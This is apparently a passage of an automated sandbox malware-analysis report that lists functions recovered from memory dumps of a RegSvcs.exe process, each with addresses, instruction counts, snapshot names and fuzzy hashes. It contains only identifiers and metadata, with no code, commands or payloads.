                                                                                • Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: q
                                                                                • API String ID: 0-4110462503
                                                                                • Opcode ID: 4775151d740fdbb1f18eabbd5d8ae7b33ae98625bed12cfa858c4c1474efdf47
                                                                                • Instruction ID: 18f4b73c554d00fe91ab3966856eba0e5b51ae73f2e4f37b6a186cc82aa7bcd7
                                                                                • Opcode Fuzzy Hash: 4775151d740fdbb1f18eabbd5d8ae7b33ae98625bed12cfa858c4c1474efdf47
                                                                                • Instruction Fuzzy Hash: 1D710874E01259CFEB29DF66D850BADBBB2BF89300F14C0EAD408A7655EB345A85CF50
                                                                                Function 00FD29E0 Relevance: .7, Instructions: 719COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 038af32cbcb97d3a23fb81f3d24bf38c8e68d6cb4bebe87f92ccde17fcf47ed6
                                                                                • Instruction ID: c603b1a3545235af8ea493bf88dcce07ebe211c1cb10c05fde855c3e9e5b0324
                                                                                • Opcode Fuzzy Hash: 038af32cbcb97d3a23fb81f3d24bf38c8e68d6cb4bebe87f92ccde17fcf47ed6
                                                                                • Instruction Fuzzy Hash: 0222059384E7C18FD79287B848BD2AB7FB5CF62200B5944EFCCC242687E5595802E763
                                                                                Function 061B0040 Relevance: .6, Instructions: 596COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3b22ae0ea890bbf20f9b76458eae037df89f6a8e9755a56d28977cc6970e422e
                                                                                • Instruction ID: e420a26adf4a1e714ef61cc4aee8c2725c004d6e3feb55dbef9ccfc1376d63cf
                                                                                • Opcode Fuzzy Hash: 3b22ae0ea890bbf20f9b76458eae037df89f6a8e9755a56d28977cc6970e422e
                                                                                • Instruction Fuzzy Hash: 6852AA74E01228CFEB64DF65C884BDEBBB2BB89301F1485EAD409A7255DB359E81CF50
                                                                                Function 00FD3E09 Relevance: .3, Instructions: 302COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 84da7c7e73c875e65d51a4cb5032e53fc6d1fcc894082a2a202843cea6d2a501
                                                                                • Instruction ID: 3049849117e379786ed0a6638bc8aa6f9fcc64838fc7de6e4889fd4db3e54e47
                                                                                • Opcode Fuzzy Hash: 84da7c7e73c875e65d51a4cb5032e53fc6d1fcc894082a2a202843cea6d2a501
                                                                                • Instruction Fuzzy Hash: 23A1E635B04255CBDB08EBB4A85827E7BB3FFC8710B18896EE503E7385CE3598019B55
                                                                                Function 00FDF961 Relevance: .3, Instructions: 278COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ac9491d32d42c09bd75093146a644076d9c673c514171b8051f224667bfc8329
                                                                                • Instruction ID: a6c7e6a52222c19951f3d45029f9fbdafea8b829ef09eaec58e187e308d05dc5
                                                                                • Opcode Fuzzy Hash: ac9491d32d42c09bd75093146a644076d9c673c514171b8051f224667bfc8329
                                                                                • Instruction Fuzzy Hash: E2C1E078E01218CFDB54DFA5C894B9DBBB2BF89300F2480AAD809AB355DB355E85CF50
                                                                                Function 061BE258 Relevance: .3, Instructions: 268COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: eaee6bd9145ae48f5fb46b731567d37fce096d58adbb1aeea41cbb78d3bcc76b
                                                                                • Instruction ID: 576bf77e334425baafc7fc2b8e85040185c3b026f953b51229a03d2cb5d0bbda
                                                                                • Opcode Fuzzy Hash: eaee6bd9145ae48f5fb46b731567d37fce096d58adbb1aeea41cbb78d3bcc76b
                                                                                • Instruction Fuzzy Hash: 41C1BE78E00218CFEB54DFA5C994BDDBBB2BF89300F2490A9D409AB355DB359A81CF50
                                                                                Function 061BE6B0 Relevance: .3, Instructions: 268COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0d1b9a91abd8b01da0d7d013f702d526b69e76235cae1497b276478760d63ef8
                                                                                • Instruction ID: b9a71bc0419c0b23acd89ca47e0bb4f2543772d18d825af8cb5c8229ca4ae87f
                                                                                • Opcode Fuzzy Hash: 0d1b9a91abd8b01da0d7d013f702d526b69e76235cae1497b276478760d63ef8
                                                                                • Instruction Fuzzy Hash: 21C1BD78E00218CFEB54DFA5C994BDDBBB2BF89300F2490A9D409AB355DB359A85CF50
                                                                                Function 061BEB08 Relevance: .3, Instructions: 268COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c57a452623861ccf6a70ff024791342b5b91c4b0943d5c673789fa0b2f4b0770
                                                                                • Instruction ID: 9d8c6c7b887d76c132642e7cb26fddd7f439666851ab33210e8c06e642216134
                                                                                • Opcode Fuzzy Hash: c57a452623861ccf6a70ff024791342b5b91c4b0943d5c673789fa0b2f4b0770
                                                                                • Instruction Fuzzy Hash: 81C1AE78E00218CFEB54DFA5D994BDDBBB2BF89300F2490A9D409AB355DB359A81CF50
                                                                                Function 061BEF60 Relevance: .3, Instructions: 268COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 82b9d332472655ad538ffbe2c0671cf7d633db464cd425504a8f5bf429667e6d
                                                                                • Instruction ID: 1c01c61153e49829554ba0ea6f843008413551dc9718144664190e26364a3b0f
                                                                                • Opcode Fuzzy Hash: 82b9d332472655ad538ffbe2c0671cf7d633db464cd425504a8f5bf429667e6d
                                                                                • Instruction Fuzzy Hash: F7C1BD78E00218CFEB54DFA5C994BDDBBB2BF89300F2490A9D409AB355DB359A85CF50
                                                                                Function 061BF3B8 Relevance: .3, Instructions: 268COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7e168b6eece5f5dd9ac3f6f4bc969f4c632bb8f191f00e959b8b02e15612e0ca
                                                                                • Instruction ID: bd5df7f72e446475a691640ab9f28825f23a4802f6a9c9537746fa27917f3337
                                                                                • Opcode Fuzzy Hash: 7e168b6eece5f5dd9ac3f6f4bc969f4c632bb8f191f00e959b8b02e15612e0ca
                                                                                • Instruction Fuzzy Hash: 55C1BE78E00218CFEB54DFA5C994B9DBBB2BF89300F2090A9D409AB355DB355A81CF50
                                                                                Function 061BF810 Relevance: .3, Instructions: 268COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 77a344ed76e3b1897c764804cc3607b0aeccb387f59884211d4bf7c2288fabb7
                                                                                • Instruction ID: 56800a7f83c7daf10ae1e8492cddeece1e9f740fff407f51a4a117f4a48cef51
                                                                                • Opcode Fuzzy Hash: 77a344ed76e3b1897c764804cc3607b0aeccb387f59884211d4bf7c2288fabb7
                                                                                • Instruction Fuzzy Hash: 23C1BF78E00218CFEB54DFA5D994BDDBBB2BF89300F2490A9D409AB355DB359A81CF50
                                                                                Function 061BCCA0 Relevance: .3, Instructions: 268COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6b6b628ea52aa1e79932d9a96702978766ef1d8401432e10a73f8d4127cd62ab
                                                                                • Instruction ID: 1512e9470870e6820e3d7e115ebc37660476acf2f05e9f9e5a999327ac898507
                                                                                • Opcode Fuzzy Hash: 6b6b628ea52aa1e79932d9a96702978766ef1d8401432e10a73f8d4127cd62ab
                                                                                • Instruction Fuzzy Hash: 44C1AF78E00218CFEB54DFA5D994BDDBBB2BF89300F2490A9D409AB355DB359A81CF50
                                                                                Function 061BD0F8 Relevance: .3, Instructions: 268COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a54fd7e2dd41d3863b0d012d2afea06ee1de4dd20c2038fd2cfec0fd2613f2d9
                                                                                • Instruction ID: dc7621f6e93b47e9febcf7e11f96f9175ff3763bf51c370b99efe678dc742096
                                                                                • Opcode Fuzzy Hash: a54fd7e2dd41d3863b0d012d2afea06ee1de4dd20c2038fd2cfec0fd2613f2d9
                                                                                • Instruction Fuzzy Hash: 00C1CE78E00218CFEB58DFA5D994B9DBBB2AF89300F1090A9D409AB355DB359A85CF50
                                                                                Function 061BD550 Relevance: .3, Instructions: 268COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6988848913ca73f6a2796e3405a11aad9fb5548f031c715d422b50ab1605001b
                                                                                • Instruction ID: 15898f0ebf061b4fdd66c31b28e8ca07efd5b315045045985a0a5819a03f4661
                                                                                • Opcode Fuzzy Hash: 6988848913ca73f6a2796e3405a11aad9fb5548f031c715d422b50ab1605001b
                                                                                • Instruction Fuzzy Hash: DEC1CF78E00218CFEB54DFA5D994BDDBBB2BF89300F2090A9D409AB355DB359A81CF50
                                                                                Function 061BD9A8 Relevance: .3, Instructions: 268COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7a722f4df7799bc700362c534f34d35dfc0d1665a1c683fd379ae9b667320384
                                                                                • Instruction ID: 760931e48b612148cf726dac44ac6e5ec36637389a730bc51846e0dbf35ae2e3
                                                                                • Opcode Fuzzy Hash: 7a722f4df7799bc700362c534f34d35dfc0d1665a1c683fd379ae9b667320384
                                                                                • Instruction Fuzzy Hash: 7FC1BE78E00218CFEB54DFA5D994B9DBBB2BF89300F2490A9D409AB355DB359A81CF50
                                                                                Function 061B9328 Relevance: .3, Instructions: 260COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a2903cd7f67cc235f8fa51231b7ed6ded34d596d83daa509f87764e48c9c7c63
                                                                                • Instruction ID: d5b43c530653c79fda08e33654c2ae7f4ef4e5573c3b4b705874f29d28694aca
                                                                                • Opcode Fuzzy Hash: a2903cd7f67cc235f8fa51231b7ed6ded34d596d83daa509f87764e48c9c7c63
                                                                                • Instruction Fuzzy Hash: 0B91C171E006188FDB58DFB9C9402EEBBF2AFCA310F149969D519A7391DB348906CB91
                                                                                Function 061B5022 Relevance: .2, Instructions: 222COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: bef2f169c4bc3ccd9118510c81b6800aeb01b40bb56d83f1efdeb9cdfabdf76d
                                                                                • Instruction ID: f26cee58e7c4ae7af298af5e59af30ec5bc0ea13102a6cd0fcf0744bf5f5b7bf
                                                                                • Opcode Fuzzy Hash: bef2f169c4bc3ccd9118510c81b6800aeb01b40bb56d83f1efdeb9cdfabdf76d
                                                                                • Instruction Fuzzy Hash: 0DA10571D107198EDB14EFA9C844ADDFBB2EF89304F14D2AAE45867260EB709A85CF41
                                                                                Function 00FDF2C0 Relevance: .2, Instructions: 158COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 444cedb7ee870e311303270fe5ee3cc717aac1da7bf683d3cdc84cb920ed72ac
                                                                                • Instruction ID: ad2e88576776076de6617eb7ba5000146f63169e57b339bf28bc3b40e08dd7d9
                                                                                • Opcode Fuzzy Hash: 444cedb7ee870e311303270fe5ee3cc717aac1da7bf683d3cdc84cb920ed72ac
                                                                                • Instruction Fuzzy Hash: ED516C70D00208CBDB04EFA8D844BDEB7B2FF8A310F28C16AE406AB395D7759945DB50
                                                                                Function 00FDF4AC Relevance: .1, Instructions: 146COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0c812829a9979c55829bcd7bb73e098c62c65e1e37752bcd8c2337053235cf43
                                                                                • Instruction ID: 6c24f172a5fad3b45562cca26142f34512ab284cffa83f90c1bb705c2737bb4f
                                                                                • Opcode Fuzzy Hash: 0c812829a9979c55829bcd7bb73e098c62c65e1e37752bcd8c2337053235cf43
                                                                                • Instruction Fuzzy Hash: 00511670D01208CFDB10EFA8D484BAEB7B2BF4A315F28816AE406AB394D7359945EF50
                                                                                Function 061BD999 Relevance: .1, Instructions: 113COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ad0c7197ab7d8bd3e303edbe02917a7dfadaa882b93e26d89c2bcead9c3a1644
                                                                                • Instruction ID: c35003b4ad99706d6675b80467509c33e1227d7db290c121e01c4409839b4ce9
                                                                                • Opcode Fuzzy Hash: ad0c7197ab7d8bd3e303edbe02917a7dfadaa882b93e26d89c2bcead9c3a1644
                                                                                • Instruction Fuzzy Hash: 8C415870E052888FEB59CFBAD8506DDFBF2AF8A300F24D56AC454AB259DB345946CF10
                                                                                Function 061B8B91 Relevance: .1, Instructions: 112COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 63df9c816cbdf28780b6f5e8282f405893d734219afc9b476e5cc876b83842cb
                                                                                • Instruction ID: fbf77b873ec1ab4908ddaa99e51082f0f130e4b2b9c7adb5615a0223c9b6ebdd
                                                                                • Opcode Fuzzy Hash: 63df9c816cbdf28780b6f5e8282f405893d734219afc9b476e5cc876b83842cb
                                                                                • Instruction Fuzzy Hash: 2F41F9B1D016589BEB58CFAAD8843CEFBF6BF88314F14C52AE418AB294DB740545CF51
                                                                                Function 061BE24A Relevance: .1, Instructions: 104COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 5d99f221f7a5991587bba4f51988aafedfbb8918355fc9e127796c7ba4315801
                                                                                • Instruction ID: 97479f6f2c1883e9d4bc178c853e6f62377be3606bb0afde467c01ed0b7d3c22
                                                                                • Opcode Fuzzy Hash: 5d99f221f7a5991587bba4f51988aafedfbb8918355fc9e127796c7ba4315801
                                                                                • Instruction Fuzzy Hash: 0341E270E01248CBEB58DFBAD9406EDFBF2AF89300F24D56AC419AB258DB345946CF54
                                                                                Function 061BEAF8 Relevance: .1, Instructions: 103COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 66bdb5ac78b7b83b4eded922e97db2778547411a8c6f8e142c9496fd53e3cb48
                                                                                • Instruction ID: a1f42d7e539c0d4453ff2c3da3b36c915298b5c879240b912bac1b086bd7491b
                                                                                • Opcode Fuzzy Hash: 66bdb5ac78b7b83b4eded922e97db2778547411a8c6f8e142c9496fd53e3cb48
                                                                                • Instruction Fuzzy Hash: D141F270E012488BEB58DFBAD9446EDFBF2AF89300F24D52AC419BB258DB345946CF54
                                                                                Function 061BD540 Relevance: .1, Instructions: 102COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2938901de9fdbd73d04e785010cbc68d5904818da704fe0ee4aa9c3b780835e9
                                                                                • Instruction ID: ad37adda921371d86f28a82da479f0c01fe1cbed8606259dc8aa25eff517963e
                                                                                • Opcode Fuzzy Hash: 2938901de9fdbd73d04e785010cbc68d5904818da704fe0ee4aa9c3b780835e9
                                                                                • Instruction Fuzzy Hash: BF410370E012488BEB58DFAAD9506EDFBF2AF89300F24D13AD418AB259DB345946CF54
                                                                                Function 061BEF51 Relevance: .1, Instructions: 101COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 04b1b1ba95da7ac6936f05b7a0270a0638b8ed8aac2da8d6b974e61f59a38813
                                                                                • Instruction ID: 0b6d0c2fe323a056ab9200bb25df51558970531e24f29a0e6f6d76b0e5ee04c0
                                                                                • Opcode Fuzzy Hash: 04b1b1ba95da7ac6936f05b7a0270a0638b8ed8aac2da8d6b974e61f59a38813
                                                                                • Instruction Fuzzy Hash: 7941F370E012488FEB58CFBAC9406EDFBF2AF89300F24D569D418AB258DB344946CF54
                                                                                Function 061BF802 Relevance: .1, Instructions: 101COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a424bb9a5629721e8e0d906951240185402c1c27962983010290edd1d11fbf86
                                                                                • Instruction ID: 933e28bee3078ea48d10c39b825ba67de2a58aff4fd4eaaad6bb09267ac0d196
                                                                                • Opcode Fuzzy Hash: a424bb9a5629721e8e0d906951240185402c1c27962983010290edd1d11fbf86
                                                                                • Instruction Fuzzy Hash: 09410170E012488FEB58DFAAD9406EDFBF2AF89300F24942AD415AB258DB344A46CF44
                                                                                Function 061BE6AF Relevance: .1, Instructions: 95COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1e98f812ebabc7a24bcef65b2629c9ba96c117234bb09588495c3a64cbb1b5c2
                                                                                • Instruction ID: 64f7e3756a02db8cd8f2bce014345722e340b1c50e59494fc180e07e49ac0635
                                                                                • Opcode Fuzzy Hash: 1e98f812ebabc7a24bcef65b2629c9ba96c117234bb09588495c3a64cbb1b5c2
                                                                                • Instruction Fuzzy Hash: 9B41E170E012488BEB58DFBAD9406EDBBF2AF89300F20D12AC419BB258DB345946CF54